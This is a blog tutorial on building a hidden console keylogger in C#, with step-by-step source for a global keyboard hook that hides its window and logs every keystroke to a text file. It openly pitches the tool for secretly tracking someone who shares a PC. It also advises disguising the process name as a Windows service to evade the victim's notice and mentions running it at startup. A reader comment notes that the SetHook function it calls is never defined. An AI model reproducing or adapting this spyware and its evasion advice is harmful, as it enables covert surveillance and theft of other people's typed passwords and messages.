How to Create a Simple, Hidden Console Keylogger in C# Sharp

How to Create a Simple, Hidden Console
Keylogger in C# Sharp
Today I will show you how to create a
simple keylogger in Visual C# Sharp, which
will start up hidden from view, and record
anything the user types on the keybord,
then save it into a text file. Great if you
share a PC and want to track what
someone else is writing.
You Will Need
Visual C# 2010 Express
Step 1 Create the Project
This is semi-important, usually you don't
put much thought behind this, but I
recommend naming this project something
like "Windows Local host Process" or
whatever, so that IF the user you are
tracking suddenly decides to look up
windows processes, your app will not be so
easy to distinguish from something
Windows would already have running in
the background.
Why? Well, renaming the .exe file is not
enough, the name you give your project
will appear in the task manager, so
assuming you are not a very technical user,
if you see a process called ''cmd.exe |
ConsoleApplication5" then alarm bells
should not be ringing. However, if you see
"sysWin86 | Windows Local Host Process"
you won't know right away that it is not a
legitimate process.
So create a Console Application project,
name it appropriately and in the "Using"
clause, include the following, if it's not
already there:
using System.Diagnostics;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
Step 2 Declaration Clause and Referencing
Just below "Class YourProject {", add the
following:
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
private static LowLevelKeyboardProc _proc
= HookCallback;
private static IntPtr _hookID = IntPtr.Zero;
In the "Main" function ("public static
Main") add:
var handle = GetConsoleWindow();
// Hide
ShowWindow(handle, SW_HIDE);
_hookID = SetHook(_proc);
Application.Run();
UnhookWindowsHookEx(_hookID);
Finally, go into Project >> Add References.
In the .NET tab, choose
System.Windows.Forms and add it to your
project.
Step 3 Functions for Key Capturing
Below the Main clause, add these
functions:
private delegate IntPtr
LowLevelKeyboardProc(
int nCode, IntPtr wParam, IntPtr lParam);
private static IntPtr HookCallback(
int nCode, IntPtr wParam, IntPtr lParam)
{
if (nCode >= 0 && wParam ==
(IntPtr)WM_KEYDOWN)
{
int vkCode = Marshal.ReadInt32(lParam);
Console.WriteLine((Keys)vkCode);
StreamWriter sw = new StreamWriter
(Application.StartupPath+
@"\log.txt",true);
sw.Write((Keys)vkCode);
sw.Close();
}
return CallNextHookEx(_hookID, nCode,
wParam, lParam);
}
Step 4 DLL Imports
After adding the key capture functions, add
these:
//These Dll's will handle the hooks. Yaaar
mateys!
[DllImport("user32.dll", CharSet =
CharSet.Auto, SetLastError = true)]
private static extern IntPtr
SetWindowsHookEx(int idHook,
LowLevelKeyboardProc lpfn, IntPtr hMod,
uint dwThreadId);
[DllImport("user32.dll", CharSet =
CharSet.Auto, SetLastError = true)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool
UnhookWindowsHookEx(IntPtr hhk);
[DllImport("user32.dll", CharSet =
CharSet.Auto, SetLastError = true)]
private static extern IntPtr CallNextHookEx
(IntPtr hhk, int nCode,
IntPtr wParam, IntPtr lParam);
[DllImport("kernel32.dll", CharSet =
CharSet.Auto, SetLastError = true)]
private static extern IntPtr
GetModuleHandle(string lpModuleName);
// The two dll imports below will handle
the window hiding.
[DllImport("kernel32.dll")]
static extern IntPtr GetConsoleWindow();
[DllImport("user32.dll")]
static extern bool ShowWindow(IntPtr
hWnd, int nCmdShow);
const int SW_HIDE = 0;
Step 5 Compile and Try it Out!
This is the fun step. Once you have added
all the code, just run the compiler and try
out the .exe!
As the window is hidden, but still records
every keystroke, you will now log all the
keystrokes ever pressed on that PC.
Further Improvements
Log file management could be improved by
inserting line breaks at certain intervals.
Something I did not bother with for this
particular exercise.
It is possible to create a global mouse hook
which will tell you what applications your
mouse interacted with, where the cursor
was and so forth. Google is your friend on
this one.
Run @ Startup script.

1 comments:

Unknown said...

SetHook does not exist.

Post a Comment

 
Copyright © PC Tricks